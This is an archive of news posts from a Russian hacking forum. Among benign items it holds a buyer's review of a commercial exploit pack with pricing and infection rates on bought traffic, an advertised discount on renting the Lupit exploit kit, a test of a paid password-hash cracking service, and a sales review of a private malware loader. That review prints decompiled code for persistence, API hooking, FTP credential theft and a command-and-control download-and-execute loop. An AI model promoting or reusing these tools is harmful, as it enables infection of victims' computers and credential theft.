Архив новостей (2004-2015 год)

[Schtirliz]

С новым 2010 годом.

Уважаемые мемберы. От всей души поздравляю Вас с новым годом. Пусть он принесет вам только хорошее. Забудутся старые обиды, появятся новые знакомства, жизнь наладится, любимые вас обнимут и поцелуют! Не забывайте сидя за мониторами отвечать им взаимностью. Серваки и работа - не главное в этой жизни. Семья и близкие - вот та цель ради которой все и происходит. Позвоните друзьям и родителям. обсуждаем здесь
[New$paN]

 

[Ar3s]

Ping уважаемые мемберы!
Пришла весна, потекли лужи, а у меня появилось немного свободного времени.
Сегодня я буду вместе с GOONER-ом вещать в сеть рассказ о новой связке эксплоитов от наших заморских коллег.

---------------------------------------------------------------------------------------------------------------------------------

Итак поехали:
Официальный топик связки тут!

Основные моменты:
Globals

+ Flash10
+ Adobe Acrobat Reader (<= 9.2)
+ JRE (Many vulnerable)
+ AGGRESSIVE MODE**

Internet Explorer
+ MDAC
+ DSHOW
+ MS09-002

Exploit rates on test run (26/2/2010)

Internet Explorer 6 & 7 - 39%
Firefox - 14%
Opera - 6%
Overall Rate: 30%

Rate Countries:

US: 14%
UK: 7%
IN: 38%
DE: 16%
TR: 22%
IT: 18%
AU: 11%

Ну и как всегда смотрим цену:
$400 - 1 License
1 License includes:
+ Domain locked one domain (subdomains unlimited)
+ 2 new domain builds if blacklisted
+ Support
+ Minor updates for free
+ Discount on new releases

---------------------------------------------------------------------------------------------------------------------------------
Связываюсь с автором icq 631592697
Общаемся на моем ломаном английском... Автор, кстати, из Скандинавии.
Получаю пак в руки. Смотрю... (!!!Рис.1)
Размер файлов 722 Кб.
Плюс отдельно мне давали базу geoip в виде sql. Она 5,5 метра еще завесила. (к сожалению ее мне дали уже после тестов. Это была первая недоработка. На ее исправление автору потребовалась неделя... Что меня несколько смутило.)
Все файлы под ионом.

Требования под связку довольно стандартные:
Linux, PHP5, MySQL, libcurl, ioncube

Беру хост, устанавливаю. (!!!Рис.2)

-------==Тест №1==------
Первый тест проводим на трафе автора. Для подведения статистики отстука использовался MyLoader.
Скрин лоадера до прогруза (!!!Рис.3)
Скрин связки по трафу и сплоитам (!!!Рис.4)
Скрин связки по рефам (!!!Рис.5)
Скрин связки по Странам (!!!Рис.6) (Как я и говорил предварительно - у меня тут были глюки в самой связке. И GeoIP тупо не отрабатывал.)
Скрин связки по настройкам (!!!Рис.7)
Скрин связки по проверке домена на блэк-листы (!!!Рис.8) (К сожалению эта функция у меня не работала. Причину нас с автором выяснить не удалось. Пускать его на мой хост не хотелось, а ему разбираться в моих глюках было лениво. Это недоработка номер два.)

Что хочу дополнительно сообщить. Меня смутило два момента.
1. Идет траф - загрузок нету. Затем резкий скачек и вдруг пробив 34%.
2. Траф считается как-то десятками. 31-41-51-61. т.е. обновляю стату - 31, еще раз обновляю - 41. и т.д. Потом начал тупо рефрешить нон-стоп. Поймал значение 63. Чушь какая-то.

А теперь малость статистики:
Автор слил 1226 хитов. Пробив по ним был суммарный 23%.
Из них: IE - 29%, FF - 10%, Opera - 8%
Итого 287 лоадов было сделано.
Смотрим на лоадер и видим, что остучалось 193 бота, что составляет 67,2%.

Скрин общий. (!!!Рис.9)
Скрин по билдам. (Грузил со связки билд *****508) (!!!Рис.10)
Скрин по странам (!!!Рис.11)

Автор меня малость поразил. Или он рассчитывал что тут все лохи, или что не заметят, но сливал траф с большим перевесом IE. (IE - 855, FF - 332, Opera - 39 хитов, естественно mdac в списке победителей....)
Это конечно же благоприятно отразилось на финальном показателе пробива. Но мы же не олени и прекрасно представляем что получится на "боевом" трафе...

-------==Тест №2==------
Траф беру у знакомого сэллера.

Скрин MyLoader до прогруза (!!!Рис.12)
Скрин связки в работе (!!!Рис.13)
Скрин связки по рефам (!!!Рис.14)
Скрин MyLoader после прогруза (!!!Рис.15)

Ar3s - что это за траф?
seller - вплане?
Ar3s - источник?
seller - фтп, шеллы
Ar3s - очень большая разбежка получается с другим трафом. Там пробив 24% был. Тут 8%...
seller - с каким другим ?
Ar3s - я брал для этого теста еще один траф.
seller - ммм .. хз .. у меня 12% норм пробив

Статистика связки такова:
Слито 2483, пробито 208, пробив 8%.
Траф в этом тесте шел вполне обычный, IE 619, FF 1165, Opera 699. Соответственно здесь нужно было поработать сплоитам под FF, что собственно и видим. В статистике рулит Java-сплоит.

Статистика по лоадеру: 208 отгружено, 108 отстучалось, процент отстука 51,9%.

-------==Тест №3==------
Беру траф у знакомого. Он на биржах любитель тариться. Гоним, смотрим.

Скрин MyLoader до прогруза (!!!Рис.16)
Скрин связки в работе (!!!Рис.17)
Скрин связки по рефам. (!!!Рис.18)
Скрин MyLoader после прогруза (!!!Рис.19)

Статистика связки такова: 1061 - отгружено, 82 - пробито, это составляет 8%.
Траф шел IE 200, FF 459, Opera 402. (Java опять в лидерстве)

Статистика по лоадеру: 82 отгружено, 27 отстучалось, что составляет 32,9%.

Из-за неработающего GeoIP страны трафика в тестах отследить не удалось. Но по заверениям сэллеров - это был микс европа.

 

[Ar3s]

Поздравляем нашего пользователя LinXer. Он стал пользователем №11111. Это не пятизнак, но очень приятная цифра для нашего форума, которая значит, что форум не мертв и пользователи продолжают приходить к нам, ища поддержки, советов и теплой дружеской компании. Ура!!! (тут звучат фанфары )

p.s. Сейчас в закрытом разделе идет обсуждение подарка для этого пользователя. Думаю, что сюрприз удастся!

 

[Schtirliz]

Состоялся релиз Ubuntu «Lucid Lynx» («ясная рысь») 10.04 LTS популярного Linux дистрибутива!
Основные изменения:

* ядро 2.6.32,
* полное удаление HAL, что позволяет ощутимо сократить время загрузки/выключения и выхода из режима сна,
* GCC версии 4.4.3,
* Python версии 2.6.5,
* драйвер NVidia по умолчанию Nouveau,
* GNOME 2.30;
* Убран GIMP
* общие улучшения в Ubuntu One,
* интеграция магазина Ubuntu One Music Store,
* Ubuntu Software Center 2.0,
* новое графическое оформление (полный ребрендинг ubuntu),
* добавлен пакет Gwibber — клиент для социальных сетей
* добавлен видеоредактор Pitivi,
* добавлен пакет Simple Scan — простое и удобное сканирование;
[New$paN]
Источник: SecNull.Media

Спойлер: 1

Desktop I386: narod.ru/disk/20235782000/ubuntu-10.04-desktop-i386.iso.html
Desktop AMD64: narod.ru/disk/20234274000/ubuntu-10.04-desktop-amd64.iso.html

 

[Ar3s]

Предлагаем вашему вниманию два новых обзора от наших мемберов:

Обзор phoenix exploit pack v2

Автор el-
Читать!

 

[Ar3s]

Томогавк тебе в спину или как настроить Cherokee Webserver

Автор TrueUser
Читать!

 

[Ar3s]

Убей соседа лопатой, или DOS по детсадовски! (обзор возможности ddos, за счет расщепления обычного трафика)

атвор: trueuser
Читать полностью!

 

[Ar3s]

Порталу xss.pro/ требуются ньюсмэйкеры.
Требования:
1. возможность уделить форуму 1 час в день.
2. Возраст >17 лет.
3. Знание русского языка. Минимум - знание 11 класса.
4. Умение формулировать свои мысли, оперативно решать вопросы, дружелюбность и терпимость к пользователям.

Кандидатуры прошу оставлять в этой теме. Они будут рассматриваться по мере поступления. Прошу так же дописать какую тематику вы бы хотели освещать. (новые сплоиты, новинки ПО, события в рунэте и т.д.)

P.S. все ньюсмэйкеры после первого месяца плодотворной работы получат доступ к 1-му приватному разделам и будут приняты в команду DL.

Наша задача - вернуть порталу посещаемость. Наполнить портал интересными событиями и обсуждаемостью.

 

[Ar3s]

Внимание! Всем посетителям xss.pro/!

Отныне всем желающим арендовать связку эксплоитов Lupit предоставляется пожизненная скидка 5% на аренду связки, при сообщении автору волшебной фразы "Я с damagelab!".

Подробнее о связке можно прочитать здесь!

 

[DarckSol]

Американские ученые подсчитали, что при нынешних темпах роста Сети оставшихся незанятыми IP-адресов хватит на 343 дня.

Незанятые IP-адреса в рамках протокола IPv4 кончатся менее чем через год, сообщает Read Write Web со ссылкой на слова Джона Куррана (John Curran), президента и исполнительного директора Американского реестра интернет-адресов (ARIN).

В IPv4, наиболее широко применяемом IP-протоколе в современном Интернете, используются 32-битные адреса. Это значит, что всего в рамках данного протокола можно создать чуть больше 4 млрд IP-адресов.

По данным Куррана, сейчас незанятыми остаются около 234 млн адресов, то есть менее 6% от общего адресного пространства. Этого запаса, по его расчетам, хватит примерно на 343 дня. Слова Куррана подтвердил Винтон Серф (Vinton Cerf), глава комитета по разработке и внедрению интернационализованных доменных имен и один из «евангелистов» Google.

Запасы IP-адресов, пишет Read Write Web, стремительно подходят к концу из-за резкого роста объема данных, которыми пользователи обмениваются через Интернет, а также из-за увеличения количества устройств с подключением к Сети.

Это значит, что провайдерам и телекоммуникационным компаниям в ближайшем будущем придется изыскать альтернативные решения — например, перейти на протокол IPv6, в котором используются 126-битные адреса, или же применить технологию NAT (Network Address Translation), которая позволяет соотнести несколько адресов с одним IP-адресом.

Источник: http://www.newsland.ru/News/Detail/id/536189/cat/69/

 

[Ar3s]

Каждую последнюю пятницу июля отмечается День системного администратора.
А вы поздравили своего админа?

 

[Ar3s]

Здравствуйте уважаемые мемберы xss.pro/!
Вновь я взялся за перо написания. Вынул его из далекого ящика, стряхнул "пыль веков", макнул в чернильницу и началось.

---===Описательная часть===---

Собственно, вопрос повестки дня - рассмотрение нового на нашем форуме сервиса http://www.cmd5.ru/

Итак приступим.
Заходим на http://www.cmd5.ru, оцениваем. Интерфейс не фонтан, но нам с вами рюшечки и не нужны.
В первую очередь я по старой привычке лезу в раздел Тарифы http://www.cmd5.ru/password.aspx
Что мы с вами видим - видим два варианта развития событий.
1. Online Service - чек по существующим базам паролей.
Поддерживаются следующие виды хэш кодов: md5, md5(md5($pass)), sha1, md4, mysql, mysql5, qq hash, serv-u,
md5($pass.$salt), md5($salt.$pass), md5(md5($pass).$salt), md5(md5($salt).$pass), md5($salt.$pass.$salt),
md5($salt.md5($pass)), md5(md5($pass).md5($salt)), md5(md5($salt).md5($pass)), sha1($username.$pass)

2. Background Service - брут заданного вами хэша на заявленном кластере. Громко сказано насчет кластера. Мы позже попробуем уточнить так ли это?
Поддерживаются различные варианты md5 mysql sha1.
Рис.3

Смотрим цены:
Online Service для некоторых видов хэшей бесплатен. Оплата не взимается для следующих комбинаций:

1. Длина 1-5 бит. Символы: [0-9a-zA-Z]
2. Длина 6 бит. Символы: [a-z]
3. Длина 7 бит. Символы: [0-9]
4. Длина 8 бит. Символы: [0-9]

Это конечно же приятно. Но всего 5 символов на пароли в базах Жаль.
Далее:
Online Service
4 hash 1000 hash 50000 hash 1000000 hash
4$ 20$ 200$ 1000$

Background Service
2 hash 50 hash 1000 hash
2$ 20$ 100$

Ну, тут все ясно. Цены вполне приятные. Самый хилый расклад - 1 пасс = 1$ для любого типа услуг, но с поправкой на то, что при использовании брута нет гарантий на успех.
Разница в скидках тоже ясна и политика сервиса тоже. Чек по базе - это одно, а нагрузка на серваки для брута - это совсем другое. Вообщем вполне приемлемо. т.к. при бруте локальной машиной больше бабла заплатишь за электричество. Да и комп постоянно занят будет.

Но политика сервиса неоднозначна в плане платежей. Ну, нужно мне, допустим, 5 паролей подобрать (допустим все с первого раза), получается я должен за них 20$ заплатить? При таком раскладе цена пароля не один бакс, а четыре!!! Неправильно на мой взгляд. "Скок хочу - сток ложу" - это правильнее было бы, на мой взгляд + система бонусов.

Далее мы регистрируемся. Регистрация занимает ровно 20 секунд. Никаких подтверждений и сложных паролей. Я зарегился с пассом 123123.
Ну да и пофиг. Я же надеюсь, что никто не будет брутить мой акк? Ну или будут? Вот интересный вопрос, а как скрипт авторизации относится к бруту?

Лезу проверять все что заявлено и тут же нахожу парадокс:
на главной странице можно чекать хэши поштучно, и есть групповой чек.
А типы хэшей разнятся. Рис.1 и Рис.2
Ну почему руками я могу пробить хэш практически любого формата, а копипастом листа нет?

Ладно, на все эти мелочи можно закрыть глаза, если сервис покажет себя с лучшей стороны в работе.
Приступим ка мы лучше к тестам.


---===Тесты===---
Для анализа мы возьмем пароли различного уровня сложности и разных форматов:
root - самый простой (4 символа в нижнем регистре)
12227000 - цифровой (8 цифр)
t00r mega - смешанный букво-циферный + пробел, 9 символов. (1 пробел, 2 цифры, 6 символов нижнего регистра)
AdM1ncH3gg1247 - смешанный букво-циферный 14 символов в разном регистре (5 цифр, 3 буквы в верхнем регистре, 5 букв в нижнем регистре)
$aL0 BbIl0 TUT* - смешанный букво-циферный, со спецсимволами. 15 символов (2 спецсимвола, 2 пробела, 2 цифры, 2 символа в нижнем регистре, 6 символов в верхнем регистре)
адидас - простой пароль, но на русском языке.

Итак конвертить будем при помощи passwords pro. Тестить будем на md5, double md5, sha1, mysql5 массовым чеком.

md5
63a9f0ea7bb98050796b649e85481845 - найден
bfac3193e9e16cbe8605350433999c1a - найден
6cf1cc8d94add3f076f069643b48dc73 - не найден
882ee12fe082589a9441ffef69fa34db - не найден
dba976f5c4c5bd66fca0b8e5531c086a - не найден
df64dc2eb4a0b85091dd31eb4923eaac - найден*
Рис.4

* Пароль на кириллице был найден, но вместо ответа были выданы вопросики. Решил протестить через главную страницу. Ввел пароль, мне сказали что пароль в базе найден и предложили купить его. Нажал кнопку купить и вновь увидел вопросики... Это что за приколы?

double md5
b9be11166d72e9e3ae7fd407165e4bd2 - найден*
1f3b36e025b5c356463f586def7ed403 - не найден
606bc8d3451b40a4d6c5adcbccf1119e - не найден
ba3d71b14d4d63ab745721f3c1a97247 - не найден
781dbd0e6f8bbc0d8e68c4d316012a84 - не найден
0a24a3c37af9b1abe5b157d7082c0af0 - не найден
Рис.5

* вместо пароля мне показало его хэш первого уровня... Взял хэш, перекинул его в первое поле и изменил условие поиска, только после этого получил результат... Рис.6

sha1
dc76e9f0c0006e8f919e0c515c66dbba3982f785 - не найден
28a7df57d0cd745decfefe396b8884256ecc03a6 - не найден
5c35190c23dc2fafac8a9d551e45c95b4e881361 - не найден
aece4055e2ac9a9a61b52c0f2f8009eb1794667b - не найден
7cb891cc0ad556a88685970290d4e475a1bf885b - не найден
00026b85ea15a4c308623a853ece6a5211a2f731 - не найден
Рис.7

mysql5
81f5e21e35407d884a6cd4a731aebfb6af209e1b - найден
fac48d7e572c78d4aaf44711832af1b482e67968 - найден
a1b5dfe04a6fc76d669ff63bfc5cfcc6932fad5b - не найден
25e5903bd16fd4db6ff69fe939276440dbe5b0e8 - не найден
d135a257f91faad97092bd94b255f3d0abc07f81 - не найден
ce6b71f2c47b3051c478398503905cb6be7da47e - найден
Рис.8

Походу теста возник вопрос, если я брутил пароль, и сбрутил его, в их базы добавляются все возможные хэши пароля или только искомый? Спросим позднее об этом представителя сервиса...

Ладно. Осталась надежда на "кластер". Попробуем сбрутить.
Берем не найденные пароли из каждого захода:
md5 - принято к бруту 3 пароля. Рис.9
double md5 - к бруту принято лишь три пароля. Рис.10 Предложили два проверить на главной. И о чудо!!! С главной я получил результат за $. Почему тогда при массовом чеке результата не было???
sha1 - -//- Рис.11
mysql5 - -//- Рис.12

Я тут в одном тесте промазал и вместо mysql оставил sha1. Сервис не говоря ни слова принял их к бруту и скушал деньги с баланса. И тут я начал считать длину хэшей. В обоих случаях по 40 символов. Но в описании есть строки о том, что SHA1 пишется только в нижнем регистре, а mysql5 только в верхнем. Поиск по хэш-генераторам в сети четкого ответа не принес т.к. при генерации оба хэша показывались в нижнем регистре. И как различить два вида хэша я в данном случае не знаю.
Ждем итогов брута...

Результаты плачевны. Пароли не подобрало. Рис.13

И тут вылез еще один косяк. Мой любимый passwords pro оказался муда**м. Он оказывается с великим и могучим не дружит ни разу.
Слово адидас по онлайн сервисам http://xss.pro/index.php?act=toolz и http://fredomkb.free.fr/testdirlist/text2md5.php имеет совершенно другой хэш.
69a11ac70caf7427c78ec34d21c5d313. А хэш использованный ранее реально принадлежит "?????" (пяти вопросам подряд), таким образом придется начинать этот тест сначала.
Пришлось перечекать это слово заново. Итог изменился не в лучшую сторону. Такого слова в базах нет. Рис.14
Поставил на брут новый хэш. А вдруг сбрутит...

Результаты брута ничего не изменили. Искомые пароли не найдены. Ни в латинских, ни в кириллической раскладке. Рис.13

---===Тест2===---
Ну бог с ним. Допустим во мне где-то живет злой админ и генерит страшные и сложные пароли. Лезем в сеть и находит самые часто используемые пароли:
letmein - top100
ncc1701 - top200
jasper - top300
redskins - top400
mistress - top500
(по статистике сайта http://qtxt.ru/500passwords)


md5 - Найдены все. Рис.15
double md5 - 1 и 3 пароли типа были в базе, но вместо пароля мне показало хэш первого уровня.
sha1 - совпадений при групповом чеке найдено не было.
mysql5 - совпадений при групповом чеке найдено не было.

Проверяем с учетом найденной баги через главную эти же пароли:
letmein - md5 - найдено
ncc1701 - sha1 - найдено
jasper - MySQL5 - найдено
redskins - double md5 - найдено
mistress - md4 - не найдено. Отправляем на перебор - успешно! Рис.16


---===Тест3===---
Я достаточно требователен был к этому сервису. Мне все хотелось магического исполнения моих желаний и никоим образом не облома.
Перечитав более внимательно параметры брута я сократил сгенеренные мной пароли до 8 циферно-буквенных, но они не массовые, я их сгенерил слепым двухпальцевым методом.
А то из всех возможностей системы я использовал только эту:
"1-15 бит другие данные Частично включено >28000 миллиардов и 1-20 бит Уникальный словарь 900G > 910 миллиардов"

Покурил условия еще раз. Поматерился. Потребовал у представителя выделить их красным и жирным...
Для 32-бит MD5 перебор осуществляется по комбинациям случайных символов длиной 1-7 бит, символов нижнего и верхнего регистра из 1-8 бит, символов нижнего регистра и цифр из 1-9 бит, а также комбинаций цифр длиной 12 бит.
Для всех остальных типов хэшей перебор осуществляется по комбинациям символов нижнего регистра и цифр длиной 1-9 бит с использованием уникального словаря объемом 200Gb.
т.к. я юзал double md5 и SHA1 - пришлось еще и верхний регистр убрать.


Проверяем повторно брутилку.
ставим 2 пароля в md5, два в double md5 и два в sha1.

md5
h8g6fg0h7 - 2db4e3a3bdf3b3b7e81fe5df04034941 - подобрало
Wq64aU08 - fefd5b8c678ac57558635087c50ef1f0 - подобрало
247500854976 - 2bbe31ca8697161ca2eab34a9d6ee9c8 - подобрало (я ради эксперимента поставил этот же пасс брутиться на своей локальной машине. Использовал passwords pro. Заведомо зная что там только цифры - поставил в условиях брутить только цифры. Длина пароля 1 -12 бит. В иттоге на рабочем семпроне-8450 время брута чуть больше двух суток показало. Сервис же справился минут за 5. Очень даже неплохо.)

SHA1
4i50sq06h (генерированный) - dd79d461fecc01d363964fee3100dbcf85cec18f - не подобрало
lalarab6 (человекоподобный) - 47e69b5552142bd7bebe6446c4b1da19cac9f087 - не подобрало

MySQL5
mn8s7258 (генерированный) - a24987b7e87de0e3ff77e959619a2dabd1f9343a - не подобрало
jafopox1 (человекоподобный) - 88cb5e70e92b3c1aed988647c0fe63de7048d57f - не подобрало

---===Часть моей переписки с автором:===----
Вопрос: Сколько вы уже "на рынке"?
Ответ: На Российском нисколько. На Европейском и Китайском с 2006.

Вопрос: Сколько человек трудится над проектом?
Ответ: Над проектом работает 4 человека.

Вопрос: Вы писали про кластер. Что имеется ввиду? Несколько компов у вас дома, несколько серверов в одном дата-центре или несколько серверов по всему миру разбросанных? Раскройте секрет ПО используемого на ваших серверах, это самописный софт или хитрым образом объединенные наработки opensource? Брутится за счет CPU/GPU?
Ответ: Проект русско-немецко-китайский. Вычислительный центр расположен в Китае. Кластер построен на 10 серверах с использованием open-source технологий apache hadoop. Расположен в одном ДЦ. В Online service ключевую роль играет HBase, позволяющая быстро работать с такими объемами данных. В Background service используется самописное ПО использующее возможности GPU.

Вопрос: Почему в групповой отбаботке типов хэшей меньше чем в одиночной?
Ответ: В групповую обработку были добавлены часто используемые типы хэшей. Но в вашем вопросе вижу смысл, можно и добавить. Правда мне кажется мало кто группой обрабатывает md5(md5($salt).md5($pass)).

Вопрос: Почему политика именно на определенное количество проверок и оплат? Если мне хочется закинуть 27$ - я не могу этого ессно сделать.
Ответ: Чисто маркетинговый ход.

Вопрос: Как только сбрутили пасс, его хэши сразу попадают в вашу базу? Во всех различных вариантах или только в том, в котором был сбручен?
Ответ: Да сразу.
Вопрос: Меня больше интересует вторая часть вопроса. Все возможные хэши попадают в ваши базы или только тот, который брутился.
Ответ: Нет. В данный момент только одного типа, который искали.

Вопрос: Используются ли кирилические символы при бруте?
Ответ: Нет. Мы не поддерживаем кириллицу ввиду различных видов кодировок. Также как и все крупные проекты, использующие хэширование.

Вопрос: Зачем было писать отдельный софт под net framework? Это можно было на php все оформить.
Ответ: Ну если я правильно вас понял, то на серверной стороне групповой взлом хэшей и так реальзован в виде групповой обработки. А framework сделан для того, чтобы предоставить пользователю, при необходимости, возможность удаленной работы. Я согласен с тем что софт вызывает подозрение, но система без него самодостаточна и не обязывает им пользоваться. Я считаю что со временем постоянным пользователям будет удобно им пользоваться.

---===Вместо эпилога===---
Сервис очень хорош в поиске md5. База довольно обширна, 200GB лист - это впечатляет. Цены приятные. Брут очень шустрый и подбирает правильно.

Что же касается НЕ md5 - тут все несколько хуже. Брут крайне ограничен длиной и сложностью пароля. Базы не особо помогают в этом деле.

Что касается ошибок в работе интерфейса - о них было сообщено представителю сервиса. В настоящее время все они были оперативно исправлены и сервис работает как нужно. Что можно посчитать плюсом в отношении оперативности персонала.

p.s. А вообще - остался в принципе доволен работой сервиса. Основную функцию он тянет на ура. А вот уже всякие мои закидоны не удастся уместить ни в одной базе данных. Пользователям сервиса и читателям этой статьи хочу напомнить, что брут вашего замысловатого пароля штатным компом затянется очень надолго, а зайдя на сервис вы можете бесплатно узнать есть ли такой пароль в их базе и только после этого оплатить покупку. Разве не удобно? (А сам сижу и вспоминаю как ночами брутил пароли, а комп мешал спать... Киловатты потраченного электричества...)
Хочется так же отметить высокую реакцию саппорта и хорошее самообладание. Я в процессе тестов часто провоцировал нестандартные ситуации. Результат реакции всегда был доброжелательным и подробным.

 

[Ar3s]

Здравствуйте друзья, товарищи, форумчане, собутыльники!
Рад вас снова видеть. И готов представить Вам новый обзор. Надеюсь вам будет интересно узнать какой новый лоадер появился на нашем рынке. А главное - откуда такое странное название моего обзора.

--------------==Поехали==------------
Итак постучался ко мне человек с ником Sporting и icq 252133, попросил написать обзор его приватного лоадера, который они хотят продавать.
Поговорили, прикинули и я взялся за дело.

Получил админку, билд.

Админка
Устанавливая админку сразу подумал о том, что установка не автоматизирована. Установите права, залейте дамп и т.д. И только когда подошел практически к финальной части, вспомнил что эти же действия в точно таком же порядке я уже совершал. Немного прикинув мужской половой орган к органам дыхания сообразил, это же админка от myLoader ставится точно таким же способом.
Абсолютно заинтригованный полез в админку через интерфейс и действительно. Она самая. Только с новым функционалом которого я ранее никогда не встречал и без логотипа.
Смотрим скрины:[New$paN]
Рис.1 | Рис.2 | Рис.3 | Рис.4 | Рис.5 | Рис.6 | Рис.7 | Рис.8

Спрашиваю у автора лоадера, что такое? На что мне отвечают, что админку заказывали у того же чела, который для myLoader-а писал.
Ну и ладно. Я же не против. Да и как бы меня это не касается. Едем дальше.
Меня сразу предупреждают что соксы пока не доделаны, поэтому их тестить не будем.

Билд
Лоадер написан на СИ, упакован upx.
Размер билда 24 кб
Не упакованный - 44 кб.
Внутри билда лежит dll. но об этом позже.
Файл изначально палится 10/38 по статистике virtest.com Смотреть отчет.

Реверс - проводил EL-

Дали бинарь сказали реверсь, внутри обещали лоадер, фтп снифер и подмену, потом все это запостят на DL. В общем пожатый upx бинарь, чистый вес 44032 байт, собран с CRT, а так же импортирует функи из msvcrt.dll, не по хекерски, но кто мы такие, что бы судить, главное что б работал. В начале как положено находятся несколько api'шек которые тащить в иморте видимо не стоит, все имена api и dll закриптованы по средство rc4.

get_bot_id() - функа читает в буфер %SYSTEMROOT%\system32, %SYSTEMDRIVE%, GetVolumeInformation(VolumeSerialNumber), %COMPUTERNAME%, %TEMP%, ProductId из HKLM\SOFTWARE\Microsoft\Internet Explorer\Registration потому весь этот буфер посредством abs(calc_hash(ProductId) + calc_hash(buf) + GetSystemInfo(wProcessorRevision)) превращается в id для бота.

get_advert_id_from_mz_header() - функа читает 'not be r' из MZ хидера с чем то сравнивает и в итоги выделяет память под символ '0', как я понял там будет хранится advert_id в случае если грузить будут с партнерок или мб сдавать в аренду.

drop_file_2_system() - функа дропает свой файл в %SYSTEMROOT%\system32\ntdevice.exe и %USERPROFILE%\userinit.exe, причем дропает не просто через CopyFile, а читает из своего файла и пишет в нужный, потом выставляется filetime kernel32.dll, смотрится откуда стартует текущий бинарник если не из выше перечисленных путей то пускает один из них, это собственно инсталяция.

Далее дропается dll хукер из него вызывается функа, которая собственно начинает её работу об это позже. По коду можно судить о наличии очень тонкого чувста юмора у автора бот или на худой конец отсутствие фантазии как таковой

  drop_file_2_system();
  ExpandEnvironmentStringsA("%USERPROFILE%\\pizda_ftp.dll", g_ftp_dll_path, 0xFFu);
  ExpandEnvironmentStringsA("%USERPROFILE%\\pizda_ntload.dll", g_ntload_dll_path, 0xFFu);
  drop_ntload(v8);
  CreateThread(0, 0, (LPTHREAD_START_ROUTINE)load_hooker_dll_n_start, 0, 0, &ThreadId);
  lpString1 = (LPSTR)malloc(0x64u);
  lstrcpyA(lpString1, "leeman_loh");
  get_bot_type();
  ExpandEnvironmentStringsA("%USERPROFILE%\\pizda_bkurl.dat", g_bkurl_path, 0xFFu);

Потом собираем урл для отстука, как всегда самым отличным образом, непонятно зачем вообще люди мучилась придумывали sprintf

  get_full_windows_name((int)&v14);
  v10 = g_bot_type();
  VerLanguageNameA(v10, &Dst, 0xFFu);
  lstrcpyA(g_url_buffer, "id=");
  v11 = num2str_with_alloc(g_bid);
  lstrcatA(g_url_buffer, (LPCSTR)v11);
  lstrcatA(g_url_buffer, "&v=");
  lstrcatA(g_url_buffer, dword_40BEA4);
  lstrcatA(g_url_buffer, "&wv=");
  v9 = lpString;
  v12 = urlencode(lpString);
  lstrcatA(g_url_buffer, (LPCSTR)v12);
  lstrcatA(g_url_buffer, "&lang=");
  v13 = urlencode(&Dst);
  lstrcatA(g_url_buffer, (LPCSTR)v13);
  lstrcatA(g_url_buffer, "&f[]=loader");
  lstrcatA(g_url_buffer, "&f[]=dll");
  lstrcatA(g_url_buffer, "&f[]=file_hook");
  lstrcatA(g_url_buffer, "&f[]=reg_hook");
  lstrcatA(g_url_buffer, "&f[]=exec");

install_2_autorun() - Ставит бинари в авторан в reg run c именем rundll32, а так же пытается прописать shell в SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Все в принципе стандартно, в бесконечном цикле постоянно вызываются drop_file_2_system() и install_2_autorun(), а так же идет отстук на стату за заданиями. Неожиданностью было и имя принимающего скрипта http://xxxx.xxx/xxxx/manda.php.
find_alive_server - ищет живой урл для отстука в списке, который есть у бота, knok_knok - стучит на серв, а дальше возвращенный буфер парсится по строкам.

    if ( find_alive_server() )
    {
      v4 = knok_knok(g_url_buffer, (int)String1, (int)lpString1);
      v5 = 0;
      if ( !v4 )
        goto LABEL_21;
      for ( i = v4;; i += lstrlenA(v8) + 1 )
      {
        v7 = str_explode((int)L"\n", i);
        v8 = v7;
        if ( !v7 )
          break;
        if ( *v7 == 'h' )
          download_n_exec(v7);
        if ( *v8 == 'e' )
          cmd_exec((int)v8);
        if ( *v8 == 'b' )
          add_cnc_url((int)v8);
        if ( *v8 == 'd' )
        {
          if ( v8[1] == 'e' )
            mb_sleep((int)v8);
        }
        if ( *v8 == 'c' )
        {
          if ( v8[1] == 'r' )
          {
            if ( v8[2] == ':' )
              ahez(v8 + 3);
          }
        }
      }
    }

В командах ничего интересного нету, после каждой команды идет репорт на стату с подтверждением или результатами в случае если все хорошо закончилось. Ниже при наличие ftp.dll в который дропают фтп аки, его содержимое так же отправляется на стату.

Теперь описание dll'ки

В экспорте dll одна функа которая в принципе делает только это

    if ( SetWindowsHookExA(4, fn, hmod, 0) )
    {
      while ( GetMessageA(&Msg, 0, 0, 0) )
      {
        TranslateMessage(&Msg);
        DispatchMessageA(&Msg);
      }
    }

Я так понимаю это дает возможность заинжектить свою dll в другие процессы, я таким никогда не пользовался поэтому точно сказать не могу. В DllMain же при инициализации проводятся всяческие неинтересные действия и основное это ставятся хуки, при де инициализации либы хуки снимаются.

  rc4_decrypt_with_alloc((int)&v3, (int)&unk_10004770, 0xCu);// advapi32.dll
  v0 = GetModuleHandleA(lpLibFileName);
  g_advapi = v0;
  if ( !v0 )
  {
    v0 = LoadLibraryA(lpLibFileName);
    g_advapi = v0;
  }
  hook(v0, szRegDeleteValueA, (int)handler_RegDeleteValueA, (int)&real_RegDeleteValueA);
  hook(g_advapi, szRegDeleteValueW, (int)handler_RegDeleteValueW, (int)&real_RegDeleteValueW);
  hook(g_advapi, szRegQueryValueExA, (int)handler_RegQueryValueExA, (int)&real_RegQueryValueExA);
  hook(g_advapi, szRegQueryValueExW, (int)handler_RegQueryValueExW, (int)&real_RegQueryValueExW);
  rc4_decrypt_with_alloc((int)&v5, (int)&unk_100043E0, 0xCu);// kernel32.dll
  g_kernel32 = GetModuleHandleA(lpModuleName);
  if ( !g_kernel32 )
    g_advapi = LoadLibraryA(lpModuleName);
  hook(g_kernel32, szFindNextFileA, (int)handler_FindNextFileA, (int)&real_FindNextFileA);
  hook(g_kernel32, szFindNextFileW, (int)handler_FindNextFileW, (int)&real_FindNextFileW);
  hook(g_kernel32, szTerminateProcess, (int)handler_TerminateProcess, (int)&real_TerminateProcess);
  rc4_decrypt_with_alloc((int)&v1, (int)&unk_100047A8, 9u);// ntdll.dll
  if ( !dword_100069D4 )
    g_ntdll = LoadLibraryA(v2);
  hook(g_ntdll, szNtDeviceIoControlFile, (int)handler_NtDeviceIoControlFile, (int)&real_NtDeviceIoControlFile);

Что тут сказать, во первых не понятно зачем хукать ansi функции если они все равно идут в unicode аналог, к тому же вообще зачем хукать это, а не функции из ntdll, в которые все это дело рано или поздно приходит. Так же хотелось заметить при установки хука как в старые добрые времена суспендятся, а потом заново пускают треды, опять же зачем, есть возможность атомарной замены 8 байт, в случае если хукать Nt функции то там вообще 4 байт достаточно, к тому же есть техники однобайтовых хуков и даже без изменения.

